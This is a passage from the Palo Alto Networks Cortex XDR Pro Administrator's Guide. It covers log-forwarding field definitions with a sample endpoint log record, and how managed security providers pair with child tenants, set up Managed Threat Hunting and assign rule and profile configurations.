endPointHeader/tzOffset: -480
product:
facility: TrapsAgent

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 487

© 2020 Palo Alto Networks, Inc.
 customerId: 110044035
trapsId: 18520039498190352
serverHost: coreop-f-proda-mnmauto03930348053-311.proda.brz
serverComponentVersion: 2.0.9+564
regionId: 10
isEndpoint: 1
agentId: 3bcf7e5ff56e2891c78684a38b728e49
endPointHeader/osType: 2
endPointHeader/isVdi: 0
endPointHeader/osVersion: 10.12.6
endPointHeader/is64: 1
endPointHeader/agentIp: 192.168.0.21
endPointHeader/deviceName: Jeffreys-MacBook-Pro.local
endPointHeader/deviceDomain:
severity:
endPointHeader/agentVersion: 5.0.5.1193
endPointHeader/contentVersion: 42-6337
endPointHeader/protectionStatus: 0
messageData/sha256:
87e27ba9128d9c3b3d113c67623a06817a030b3bbb4d2871d1e6da9002206f26
messageData/type: macho
messageData/parentSha256:
messageData/lastSeen: 2019-01-31T18:00:43Z
messageData/fileName: crashpad_handler
messageData/filePath: /users/username/library/google/googlesoftwareupdate/
googlesoftwareupdate.bundle/contents/macos/
messageData/fileSize: 353680
messageData/localAnalysisResult:
"{""contentVersion"":""42-6337"",""result"":""Benign"",""trusted"":""None"",
""publishers"":[""developer id application: google, inc.
(eqhxz8m8av)""],""resultId"":0,""trustedId"":0}"
messageData/reported: 0
messageData/blocked: 0
messageData/executionCount: 4179

Field Name Description

recordType Record type associated with the event and that you
can use when managing logging quotas:
• config—Cortex XDR administration and
configuration changes.
• system—Automated system management and
agent reporting events.
• analytics—Hourly hash execution report from
the agent.
• threats—Security events that occur on the
endpoints.

class Class of Cortex XDR log: config, policy, system, and

agent_log.

eventType Subtype of event.

eventCategory Category of event, used internally for processing

the flow of logs. Event categories vary by class:

488 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description
• config—deviceManagement,
distributionManagement,
securityEventManagement, systemManagement
• policy—exceptionManagement,
policyManagement, profileManagement, sam
• system—licensing, provisioning, tenant,
userAuthentication, workerProcessing
• agent_log—agentFlow

generatedTime Coordinated Universal Time (UTC) equivalent

of the time at which an event was logged. For
agent events, this represents the time on the
endpoint. For policy, configuration, and system
events, this represents the time on Cortex XDR
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

serverTime Coordinated Universal Time (UTC) equivalent of

the time at which the server generated the log. If
the log was generated on an endpoint, this field
identifies the time the server received the log
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

agentTime Coordinated Universal Time (UTC) equivalent of the

time at which an agent logged an event in ISO-8601
string representation.

tzOffset Effective endpoint time zone offset from UTC, in

minutes.

facility The Cortex XDR system component that

initiated the event, for example: TrapsAgent,
TrapsServiceCore, TrapsServiceManagement, and
TrapsServiceBackend.

customerId The ID that uniquely identifies the Cortex Data

Lake instance which received this log record.

trapsId Tenant external ID.

serverHost Hostname of Cortex XDR.

serverComponentVersion Software version of Cortex XDR.

regionId ID of Cortex XDR region:

• 10—Americas (N. Virginia)
• 70—EMEA (Frankfurt)

isEndpoint Indicates whether the event occurred on an

endpoint.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 489

© 2020 Palo Alto Networks, Inc.
 Field Name Description
• 0—No, host is not an endpoint.
• 1—Yes, host is an endpoint.

agentId Unique identifier for the Cortex XDR agent.

osType Operating system of the endpoint:

• 1—Windows
• 2—OS X/macOS
• 3—Android
• 4—Linux

isVdi Indicates whether the endpoint is a virtual desktop

infrastructure (VDI):
• 0—The endpoint is not a VDI
• 1—The endpoint is a VDI

osVersion Full version number of the operating system

running on the endpoint. For example,
6.1.7601.19135.

is64 Indicates whether the endpoint is running a 64-bit

version of Windows:
• 0—The endpoint is not running x64 architecture
• 1—The endpoint is running x64 architecture

agentIp IP address of the endpoint.

deviceName Hostname of the endpoint on which the event was

logged.

deviceDomain Domain to which the endpoint belongs.

severity Syslog severity level associated with the event.

• 2—Critical. Used for events that require
immediate attention.
• 3—Error. Used for events that require special
handling.
• 4—Warning. Used for events that sometimes
require special handling.
• 5—Notice. Used for normal but significant
events that can require attention.
• 6—Informational. Informational events that do
not require attention.
Each event also has an associated Cortex XDR
severity. See the messageData.trapsSeverity
field for details.

agentVersion Version of the Cortex XDR agent.

490 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

© 2020 Palo Alto Networks, Inc.
Field Name Description

contentVersion Content version in the local security policy.

protectionStatus Cortex XDR agent protection status:

• 0—Protected
• 1—OsVersionIncompatible
• 2—AgentIncompatible

sha256 Hash of the file using SHA256 encoding.

type Type of file:

• 0—Unknown
• 1—PE
• 2—Mach-o
• 3—DLL
• 4—Office file (containing a macro)

parentSha256 Hash of the parent file using SHA256 encoding.

lastSeen Coordinated Universal Time (UTC) equivalent of

the time when the file last ran on an endpoint
in ISO-8601 string representation (for example,
2017-01-24T09:08:59Z).

fileName File name, without the path or the file type

extension.

filePath Full path, aligned to the OS format.

fileSize Size of the file in bytes.

localAnalysisResult This object includes the content version, local

analysis module version, verdict result, file signer,
and trusted signer result. The trusted signer result is
an integer value:
• 0—Cortex XDR did not evaluate the signer of the
file.
• 1—The signer is trusted.
• 2—The signer is not trusted.

reported Reporting status of the file, in integer value:

• 0—Cortex XDR did not report the security event.
• 1—Cortex XDR reported the security event.

blocked Blocking status of the file, in integer value:

• 0—Cortex XDR did not block the process or file.
• 1—Cortex XDR blocked the process or file.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding 491

© 2020 Palo Alto Networks, Inc.
 Field Name Description

executionCount The total number of times a file identified by a

specific hash was executed.

492 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Log Forwarding

Managed Security
> About Managed Security
> Cortex XDR Managed Security Access Requirements
> Set up Managed Threat Hunting
> Pair a Parent Tenant with Child Tenant
> Manage a Child Tenant

493
494 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security
© 2020 Palo Alto Networks, Inc.
About Managed Security
Cortex XDR supports pairing multiple Cortex XDR environments with a single interface enabling Managed
Security Services Providers (MSSP) and Managed Detection and Response (MDR) providers to easily
manage security on behalf of their clients.
Pairing an MSSP/MDR (parent) tenant with a client (child) tenant requires a separate Cortex XDR license
for the parent tenant. To ensure bidirectional tenant access between the parent and child, both need to
approve the pairing from within the Cortex XDR app.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 495

© 2020 Palo Alto Networks, Inc.
Cortex XDR Managed Security Access
Requirements
To set up a managed security pairing, you and your child tenants must activate the Cortex XDR app, provide
role permission, and define access configurations.
The following table describes what and where you and your child tenants need to define:

Tenant Application Action

Child Customer Support Portal (CSP) Add the user name from the
Account parent tenant who is initiating
the parent-child pairing and
ensure the user name has Super
User role permissions.

Hub Provide the user name added in

CSP with Admin role permissions
to access the child Cortex XDR
instance.

Parent Customer Support Portal (CSP) Ensure the parent user name has
Account Super User role permissions.

Hub Ensure the user name added to

the child tenant’s CSP account
has Admin role permissions on
the parent Cortex XDR instance.

496 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security

© 2020 Palo Alto Networks, Inc.
Set up Managed Threat Hunting
Cortex XDR provides the Managed Threat Hunting service as an add-on security service. To use Cortex
XDR Managed Threat Hunting, you must purchase a Managed Threat Hunting license and have a Cortex
XDR Pro for Endpoint license with a minimum of 500 endpoints.
Managed Threat Hunting augments your security by providing 24/7, year-round monitoring by Palo
Alto Networks threat researchers and Unit 42 experts. The Managed Threat Hunting teams proactively
safeguard your organization and provide threat reports for critical security incidents and impact reports for
emerging threats that provide an analysis of exposure in your organization. In addition, the Managed Threat
Hunting team can identify incidents and provide in-depth review of related threat reports.
To get started with Managed Threat Hunting:

STEP 1 | Access the Cortex XDR app and approve the pairing request sent to your Cortex XDR tenant.
1.
Navigate to and locate the Request for Pairing notification.

2. Select Approve and then Yes to confirm.

After the request is approved, Cortex XDR displays the Managed Threat Hunting label at the top of
the page.

STEP 2 | Configure notification emails for the impact reports and threat inquiries you want Cortex XDR
to send.
1.
Select > Settings > Managed Threat Hunting.
2. Enter one or more email addresses to which you want to send reports and inquires and ADD each
one.

3. Save your changes.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 497

© 2020 Palo Alto Networks, Inc.
STEP 3 | (Optional) If desired, forward Managed Threat Hunting alerts to external sources such as email
or slack from the > Settings > Notifications page.
This will forward both the alert itself and the detailed report in a PDF format.

498 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security

© 2020 Palo Alto Networks, Inc.
Pair a Parent Tenant with Child Tenant
After you and your child tenants have acquired the appropriate role permissions, you can pair your tenant
to your child tenants.

Pairing a Parent and Child Tenant

STEP 1 |
From your Cortex XDR app, select > Settings > Tenant Management.
The Tenant Management table displays the:
• Tenant Name—Name of the child tenant
• Pairing Status—State of a pairing request; Paired, Pending, Failed, Rejected
• Account Name—CSP account to which the child tenant is associated with
• Last Sync—Timestamp of when parent tenant last made contact with child tenant
• Managed Security Actions - a column for each security action with a status; configuration name or
Unmanaged. Unmanaged status means that a configuration for the security action has not yet been
selected.

STEP 2 | + Pair Tenant.

STEP 3 | In the Pair Tenant window, select the child tenant you want to pair. The drop-down only
displays child tenants your are allowed to pair with.
Child tenants are grouped according to:
• Unpaired—Children that have not yet been paired and are available. If another parent has requested
to pair with the child but the child has not yet agreed, the tenant will appear.
• Paired—Children that have already been paired to this parent.
• Paired with others—Children that have been paired with other parents.
• Pending—Children with a pending pairing request.

STEP 4 | Pair the tenant.

Cortex XDR sends a Request for Pairing to the specified child tenant.

STEP 5 | In the child tenant Cortex XDR console, a child tenant user with Admin role permissions needs
to approve the pairing by navigating to , locate the Request for Pairing notification and
select Approve.

STEP 6 | Verify the parent-child pairing.

After pairing has been approved, in the child tenant’s Cortex XDR app, when navigating to a page
managed by a parent configuration, the child user is notified by a flag who is managing their security:

In the child tenant’s, pages managed by you appear with a read-only banner. Child tenant users cannot
perform any actions from these pages, but can view the configurations you create on their behalf.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 499

© 2020 Palo Alto Networks, Inc.
Unpairing a Parent and Child Tenant
When you want to discontinue the pairing with a child tenant, in the Tenant Management page, right-
click the tenant row and select Request Unpairing. For the unpairing to take effect, the child tenant must
approve the request.

When a child wants to unpair, the child user needs to navigate to and select Unpair.

500 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security

© 2020 Palo Alto Networks, Inc.
Manage a Child Tenant
Pairing a child tenant enables you to view and investigate Cortex XDR data of a child tenant, and initiate
security actions on their behalf.
In your Cortex XDR, you have access to view the following pages:
• Incidents
• Alerts
• Query Builder
• Query Center and Results
• Causality View
• Timeline View
To initiate security actions on your child tenant, you need to create a Configuration. Security actions are
managed by configurations you create in the Cortex XDR app and then assign to each of the child tenants.
Each action requires it’s own configuration and allocation to a child tenant.
You can create configuration for the following actions:
• BIOC Rules
• Analytics BIOC Rules
• Exclusions
• Starred Alerts
• Profiles
The following sections describe how to manage your child tenants.
• Track your Tenant Management
• Investigate Child Tenant Data
• Create and Allocate Action Configurations
• Initiate a Security Managed Action

Track your Tenant Management

After successfully pairing your child tenant, navigate to > Settings > Tenant Management to view the
child tenant details.

The Tenant Management page displays the following information about each of your child tenants:

Field Description

Status Indicator ( ) Identifies whether the child tenant is connected.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 501

© 2020 Palo Alto Networks, Inc.
 Field Description

TENANT ID The Cortex Data Lake tenant ID.

TENANT NAME Name you defined during the pairing process.

ACCOUNT ID The CSP account ID.

ACCOUNT NAME Name of the parent tenant.

PAIRING STATUS Status of the child paring process:

• Pending
• Paired
• Approved
• Declined
• Pending
• Paired to another
• Not Paired

LAST SYNC Timestamp of the last security action sync initiated by

the parent tenant.

BIOC RULES & EXCEPTIONS Name of the configuration managing the BIOC rules
and exceptions actions.

STARRED INCIDENTS POLICY Name of the configuration managing the starred

incidents policy actions.

ALERT EXCLUSION Name of the configuration managing the alert

exclusion actions.

PROFILES Name of the configuration managing the profile

actions.

Investigate Child Tenant Data

With Cortex XDR managed security, you can investigate the Cortex XDR child tenant data.
By default, Cortex XDR displays data for your tenant. To display data for one or more of your child tenants,
select the tenants from the drop-down.

Some common tasks that you might perform include:

502 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security

© 2020 Palo Alto Networks, Inc.
 • Investigate Incidents on a child tenant.
• Investigate Alerts on a child tenant.
• Build and execute an XQL Search query to search across the data of a child tenant.
When running an XQL Search, you can execute XQL queries across a single child tenant or up to 100
child tenants simultaneously.
• For XQL queries on a single child tenant, Cortex XDR provides the parent tenant with
autocompletion and validation capabilities to all datasets available on the child tenant.
• When executing XQL queries on multiple child tenants simultaneously:
• Autocomplete and validation are only supported on Cortex XDR datasets. For example, on EDR
data, Cortex XDR Alerts, and Palo Alto Networks next-generation firewall logs.
• Queries are executed on each child tenant separately and return up to 1,000,000 results split
across the selected tenants. For example, an XQL query on 10 tenants returns a maximum of
100,000 per tenant.
• Use the Query Builder to build and execute an entity-specific query across the data of a child tenant.
You can run either an ad-hoc query or scheduled query on one or more child tenants. For each query,
Cortex XDR returns up to 100,000,000 results across all selected tenants.
• Use the Query Center to view previously run XQL searches and entity queries run on your tenant and
the child tenants.

Create and Allocate Configurations

To manage security actions on behalf of your child tenant, you need to first create and allocate an action
configuration.

STEP 1 | Navigate to each of the following Cortex XDR pages and follow the detailed steps:
• Rules > BIOC
• Rules > BIOC > Analytics BIOC Rules
• Rules > Rules Exceptions
• Investigation > Incident Management > Exclusions
• Investigation > Incident Management > Starred Alerts

STEP 2 | In the Configuration panel (1), + Create New (2) configuration.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 503

© 2020 Palo Alto Networks, Inc.
STEP 3 | Enter the configuration Name and Description.

STEP 4 | Create.
The new configuration (3) appears in the Configuration pane.

STEP 5 | Navigate to Settings > Tenant Management.

STEP 6 | In the Tenant Management table, right-click a child tenant row and Edit Configurations.

STEP 7 | Assign the configuration you want to use to manage each of the security actions.

You can configure Profiles only as Managed or Unmanaged. All profiles you create are
automatically cloned to your child tenants.

STEP 8 | Update.
The Tenant Management table is updated with your assigned configurations.

Create a Security Managed Action

After you’ve created and assigned a configuration for each of your child tenant’s security actions, you can
define the specific managed action on behalf of the child tenant.

STEP 1 | Navigate to each of the following Cortex XDR pages:

• Rules > BIOC
• Rules > BIOC > Analytics BIOC Rules
• Rules > Rules Exceptions
• Investigation > Incident Management > Exclusions
• Investigation > Incident Management > Starred Alerts

STEP 2 | In the corresponding Configuration panel, select the action configuration you created and
allocated to your child tenant.
The corresponding security action Table displays the actions managing the child tenant.

504 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security

© 2020 Palo Alto Networks, Inc.
STEP 3 | Depending on the security action, select:
• + Add BIOC to create a BIOC Rule.
• + New Exception to create a BIOC Exception.
• + Add Exclusion to create an Alert Exclusion.
• + Add Starring Configuration to create a started alert inclusion.
• + New Profile to create a new endpoint profile.

Profiles you create are automatically cloned to your child tenants.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security 505

© 2020 Palo Alto Networks, Inc.
506 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Managed Security